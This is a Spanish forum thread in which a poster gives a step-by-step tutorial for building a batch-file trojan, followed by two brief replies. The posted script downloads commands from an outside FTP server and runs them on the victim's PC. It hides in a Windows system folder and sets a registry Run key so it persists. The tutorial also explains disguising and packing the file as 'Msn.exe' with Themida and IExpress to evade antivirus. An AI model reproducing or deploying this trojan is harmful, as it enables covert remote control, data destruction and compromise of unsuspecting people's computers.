|
Título: TROYANIZANDO EN BATCH |GUN$| Publicado por: GUN$ en 6 Febrero 2008, 23:14 pm Troyanizando en batch (http://img262.imageshack.us/img262/8231/trojangz9.png) Indice: ->1.Introduccion ->2.Requisitos minimos ->3.Crear cuenta FTP ->4.Codigo para la vícitima ->5.Codigo FTP ->6.Iexpress + Themida + Cygy para Código FTP _____________________________________________________________________ 1.Introduccion · Os voy a hacer un breve tutorial de como troyanizar en batch sin usar ningun ejecutable ;) solo con un .txt y un .bat; ayudandonos de lo maravilloso que es FTP ;) 2.Requisitos minimos ->notepad.exe (jajaja) ->una cuenta ftp ->Vía de propagacion ->Iexpress + themida + cygy 3.Crear cuenta FTP ->Crea tu cuenta FTP AQUI (http://edit.europe.yahoo.com/registration) 4.Codigo para la vícitima -> Llegados a este punto, crearemos un codigo en batch al cual nombraremos como ordenes.txt (no vale otro nombre) ->abrimos nuestro notepad... y a nuestro gusto creamos el code con programacion batch ;) el cual sera ejecutado en el pc de la víctima ·comandos interesantes: -Dir -Del -Start -Reg ADD -Attrib -Shutdown Más información para crear vuestro code (http://foro.infiernohacker.com/index.php?topic=91.0) ;) Cuando tengamos el code guardado como ordenes.txt; lo deberemos subir a nuestra cuenta FTP ·ordenes.txt será el codigo que se ejecute en el pc de la victima cada vez que inicie windows ;) NOTA: Debereis rehacer a vuestro gusto vuestro ordenes.txt i volverlo a subir a vuestro ftp para que se ejecute en el pc de la victima cuando inicie windows ;) 5.Codigo FTP Aqui os pongo el .bat que le tendreis que enviar a vuestra victima ;) NOTA: Luego lo camuflaremos con themida o iexpress o cygy... comprimiendolo con un compresor (winrar, winzip....) para luego enviarlo. Citar @echo off pushd "%windir%\$NtUninstallWudf01000$\spuninst" echo username>ftp.tmp echo pass>>ftp.tmp echo get ordenes.txt>>ftp.tmp echo bye>>ftp.tmp echo quit>>ftp.tmp ftp -s:ftp.tmp ftp.geocities.com del /f /q ftp.tmp rename ordenes.txt soundUni.bat start soundUni.bat pushd "%homepath%\Mis documentos\Mis archivos recibidos" copy /Y "archivo_ftp.bat" "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat" reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Uninstall" /t Reg_SZ /d "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat /f" exit ·Username: Aqui debereis colocar vuestro usuario de ftp ·Pass: Aqui deberis poner la pass de vuestro ftp ·ordenes.txt: nunca cambies el nombre de vuestro archivo ordenes.txt ya que si lo cambiais el code no podria bajar el archivo para ejecutarlo en el pc de la victima ;) ·archivo_ftp.bat:Si el archivo que le enviareis a la victima lo compilais a .exe pues debereis cambiar el nombre a archivo_ftp.exe y si le dais un nombre menos llamativo a vuestro code pues quedaria asi: Msn.exe ... por ejemplo...en el code tmb lo debeis sustituir.... 6.Iexpress + Themida + Cygy para Código FTP -> En esta parte es donde debereis compilar vuestro "msn.bat" a "msn.exe", comprimirlo y enviarlo por alguna via de red ;) ->Tutorial + Descarga por Txshack ;) CYGY + THEMIDA + IEXPRESS (http://infiernohacker.mundoforo.com/server-indetectable-vt9.html) ->La explicacion a sido breve i un poco imprecisa :S lo siento.... si teneis alguna duda preguntenla por M.P o en este mismo post ;) _____________________________________________________________________ TUTORIAL POR GUN$ FUENTE:http://foro.infiernohacker.com/index.php?topic=2641.0 (http://foro.infiernohacker.com/index.php?topic=2641.0) Título: Re: TROYANIZANDO EN BATCH |GUN$| Publicado por: K-19 en 7 Febrero 2008, 21:50 pm Está incompleto o es cosa mia?? que contiene el archivo ordenes.txt?? :rolleyes:
Título: Re: TROYANIZANDO EN BATCH |GUN$| Publicado por: GUN$ en 10 Febrero 2008, 03:17 am contiene un codigo que ya has creado tu anterior y personalmente el cual se ejecutara en el pc de la victima
|